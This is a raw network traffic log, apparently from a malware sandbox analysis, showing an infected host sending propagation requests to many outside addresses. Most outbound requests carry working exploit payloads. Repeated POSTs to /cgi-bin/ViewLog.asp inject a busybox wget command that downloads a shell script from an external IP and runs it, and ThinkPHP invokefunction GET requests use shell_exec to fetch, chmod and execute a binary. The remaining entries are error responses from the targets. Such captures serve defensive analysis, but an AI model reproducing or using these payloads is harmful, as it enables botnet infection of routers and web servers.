                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 36 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>Apache Tomcat/7.0.76 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.76</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            565192.168.2.235795485.122.227.68080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:14.767163038 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            566192.168.2.233581431.200.83.2328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:14.768651009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            567192.168.2.235030485.158.57.1638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:14.958940029 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:15.162628889 CET396INHTTP/1.0 401 Authentication Required
                                                            WWW-Authenticate: Basic realm="proxy"
                                                            Connection: close
                                                            Content-type: text/html; charset=us-ascii
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            568192.168.2.235225631.136.124.1208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:14.976394892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:15.640897989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:16.984694958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:19.800304890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:25.175446987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:35.926022053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:58.962800980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:41.964984894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            569192.168.2.233513431.136.73.68080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:14.977422953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:15.672832966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:17.016742945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:19.800309896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:25.175589085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:35.925955057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:58.962821007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:41.964940071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            570192.168.2.234118094.120.239.2128080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.013499975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            571192.168.2.235350295.213.238.6980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.490053892 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:15.702472925 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            572192.168.2.235341295.101.158.8780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.514076948 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:15.739552975 CET478INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 256
                                                            Expires: Wed, 14 Feb 2024 08:29:15 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 38 35 30 38 63 34 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 35 26 23 34 36 3b 65 39 66 38 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b8508c4f&#46;1707899355&#46;e9f8ef</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            573192.168.2.235923895.171.107.17480
                                                            TimestampBytes transferredDirectionData
